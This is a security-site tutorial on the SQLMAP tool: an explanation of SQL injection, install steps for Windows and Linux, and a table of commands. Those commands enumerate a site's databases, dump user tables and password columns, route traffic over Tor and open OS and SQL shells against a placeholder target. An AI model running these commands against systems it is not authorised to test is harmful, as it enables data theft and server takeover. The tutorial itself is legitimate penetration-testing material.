HomeSecuritySQLMAP: How to check your site for SQL vulnerabilities

SQLMAP: How to check your site for SQL vulnerabilities

In the field of ethical hacking, SQLMAP is the preeminent tool for finding vulnerabilities based on SQL injection. It is an open source solution, written in python, which automates the process of finding and exploiting SQL vulnerabilities with the ultimate goal of full control of the database and the server on which it is located.

sqlmap

It includes several functions such as database fingerprinting, data collection, and command execution in operating systems. The SQLMAP tool can be used for the following purposes:

  • Checking a web application for SQL injection vulnerability
  • Exploiting the SQL injection vulnerability
  • Export database data and its users
  • Bypassing the Web Application Firewall (WAF)
  • Full control of the base operating system

Some of the most important features of SQLMAP are shown below:

  • It can support MySQL, Oracle, PostgreSQL, Microsoft Access, Microsoft SQL Server, IBM DB2, SQLite, Firebird and Sybase technologies.
  • It also supports 6 different SQL injection techniques: boolean-based blind, error-based, UNION query, time-based blind, stacked queries and out-of-band.
  • It supports finding hashed passwords using the dictionary attack technique.
  • It allows detection of users, hashed passwords, roles, permissions, databases, tables and columns.

What is SQL injection?

SQL injection is a hacking technique where an attacker, by modifying the URL or some other character input field of the web application, can insert SQL commands directly into the database. This results in the application's security techniques being bypassed and consequently the attacker can extract data from the entire database, modify it and even delete it.

This is one of the oldest and most dangerous attacks on web applications. The OWASP (Open Web Application Security Project) organization ranks injection threats as number one on the list of Top 10 web application security threats (OWASP Top 10).

How to use it

SQLMAP is available for Windows, Linux , and Mac. You will find it pre-installed in the Linux penetration testing distro, Kali Linux.

Windows 

The first step you need to take is to download (if you don't already have it) the python interpreter – remember that the tool is written in python. You can download the latest version from here (v 3.8.0).

After you have successfully installed python, follow these steps:

  1. Download the zip file from the SQLMAP site
  2. Unzip the folder and its contents to your desired location
  3. Open a cmd console and browse to the location where you unzipped the folder from the previous step.
  4. Run the command sqlmap.py …. And see all your possible options.
  5. Are you ready?

SQL map

Linux

Almost all Linux distros Python installed by default. If you are not sure, open a terminal and type python –version. If python is indeed installed, the above command will show you the version.

SQL

Then run the following commands to complete the installation of the tool:

sudo apt-get install git
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-devpython sqlmap.py

The last command will display something similar to the following on our screen:

sqlmap

How to use it

Below are basic commands you can use with SQLMAP and their description:

Mandate Description
sqlmap -u “https://site.com/login.php”Simple URL check
sqlmap -u “https://site.com/login.php” –tor –tor-type=SOCKS5Control using tor
sqlmap -u “https://site.com/login.php” –time-sec 20Control, defining the time frame
sqlmap -u “https://site.com/login.php” –dbsOption to return all databases of a web application
sqlmap -u “https://site.com/login.php” -D site_db –tablesReturn the contents of a specific database
sqlmap -u “https://site.com/login.php” -D site_db -T users –dumpReturn the contents of a specific table
sqlmap -u “https://site.com/login.php” -D site_db -T users –columnsReturn all columns in a table
sqlmap -u “https://site.com/login.php” -D site_db -T users -C username,password –dumpReturn content of specific columns
sqlmap -u “https://site.com/login.php” –method “POST” –data “username=admin&password=admin&submit=Submit” -D social_mccodes -T users –dumpReturn table when we have the admin login details
sqlmap –dbms=mysql -u “https://site.com/login.php” –os-shellReturn OS Shell
sqlmap –dbms=mysql -u “https://site.com/login.php” –sql-shellReturn SQL Shell

You can find a more detailed cheatsheet for SQLMAP here.

We are waiting for your comments…

📧
Subscribe to the SecNews Newsletter

The most important Security & Technology news in your Inbox.

SecNews
SecNewshttps://www.secnews.gr
In a world without fences and walls, who needs Gates and Windows

SEARCH

FOLLOW US

📧
Newsletter SecNews
The most important Security & Technology news in your inbox.

LIVE NEWS